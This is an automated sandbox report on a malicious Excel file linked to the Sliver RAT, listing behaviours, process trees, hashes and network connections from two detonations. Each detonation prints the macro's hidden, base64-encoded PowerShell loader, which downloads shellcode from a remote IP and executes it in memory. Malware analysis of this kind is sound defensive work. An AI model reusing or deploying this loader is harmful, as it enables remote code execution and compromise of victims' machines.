Analysis Overview
SHA256
1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b
Threat Level: Known bad
The file 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b was found to be: Known bad.
Malicious Activity Summary
Sliver family
Sliver RAT v2
Process spawned unexpected child process
SliverRAT
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Office macro that triggers on suspicious action
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 21:44
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 21:44
Reported
2024-11-10 21:47
Platform
win7-20241010-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fz7wigjl.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEB5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCEB4.tmp"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 832
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | 194.182.164.149 | tcp |
Files
memory/1032-1-0x0000000072BED000-0x0000000072BF8000-memory.dmp
memory/1032-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1032-8-0x0000000006C40000-0x0000000006D40000-memory.dmp
memory/1032-9-0x0000000006C40000-0x0000000006D40000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fz7wigjl.cmdline
| MD5 | f4d025a8384c02dd781716a306139c30 |
| SHA1 | cb0122dde0c65639e42e5571c747722a2b2cec2e |
| SHA256 | 5bc398899f27ff3e34edf58326f5b045ce644b79bb01c7ccd5d841eab100e138 |
| SHA512 | b21e53988ccde78902344d5b2b4eaa75758f98c02039eed8ace2d0f29563dfdd98b33fae3079fb6c531364e8ca6ee3834fc9b01f7cc75e8251289d60c445d797 |
\??\c:\Users\Admin\AppData\Local\Temp\fz7wigjl.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCEB4.tmp
| MD5 | 75bf5185e3f4e7d7bb3fd0e530484beb |
| SHA1 | cbf74a346c86949de55a97c7378a90e21a88a0f7 |
| SHA256 | 37855349549b1ee0a390c51e93937a4c3ff665672f0edbbf24dd2226e5955a44 |
| SHA512 | cd58fc36da6e1dc42e3fca54b9f54d818158752f9096172646f3255cd26498adde6dbe29336c60995778f3d570ab779f72880144308adcb3771919180a437db7 |
C:\Users\Admin\AppData\Local\Temp\RESCEB5.tmp
| MD5 | e4738abe8545e1023c52b40ba376b8d4 |
| SHA1 | 1ca8d169bc4ab45370846ae1d9926c68eaaa9ccd |
| SHA256 | aa10ee4a9a1df607b65f7d67e23af6d66ddef69fbadc6ef011fdd7a4244c7445 |
| SHA512 | 0496f63db036f75bc0b0e827a972bf35eef27d6c83052832d543bacceeb75b6b8277c663bccdfab2839e2433f3b4d379ceeebb18b1f1e295271e831ca7c0e20f |
C:\Users\Admin\AppData\Local\Temp\fz7wigjl.dll
| MD5 | ed331d2dd4cd4d35a6006f627cd1baf2 |
| SHA1 | 18cec4eb66c91e288636fc85ca0459800854a9c3 |
| SHA256 | 8c7d591ec85cf7165344fdbb1492507e8baea6b90d7f2da643fb2f215356ad15 |
| SHA512 | c65c58db45a474889dd9d6a111ad450c9c9a98a94c86d4dd7f7538f892f25f556a48f35c8042a3ad970dca820f347735a9999f5f6649bc57e278abd78106d514 |
C:\Users\Admin\AppData\Local\Temp\fz7wigjl.pdb
| MD5 | c24566c231bd71694bd8580b42067537 |
| SHA1 | 9f40da5176d1254220bf41895c1c663ca6052397 |
| SHA256 | 231508303e5b5300d577afcf06b358e9586ad5d2bf1bb2ddde9c9c41cb5545ff |
| SHA512 | b88b4d6668e4c151675bf1b8ab5a6285c30d1e467046177dc90baa29ac6d74ceb929d112b570dd48d00209a949590815b299e9924eb7c25d4c49adcedeab0096 |
C:\Users\Admin\AppData\Local\Temp\CabDB34.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1032-43-0x0000000072BED000-0x0000000072BF8000-memory.dmp
memory/1032-44-0x0000000006C40000-0x0000000006D40000-memory.dmp
memory/2252-45-0x0000000006920000-0x000000000739E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 21:44
Reported
2024-11-10 21:47
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4856 wrote to memory of 1392 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4856 wrote to memory of 1392 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1392 wrote to memory of 4872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 1392 wrote to memory of 4872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 4872 wrote to memory of 1676 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 4872 wrote to memory of 1676 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6590.tmp" "c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\CSCC14A741FB0A34AB68F6F7ABD8FE589A5.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| CH | 194.182.164.149:8080 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.164.182.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| CH | 194.182.164.149:443 | tcp | |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
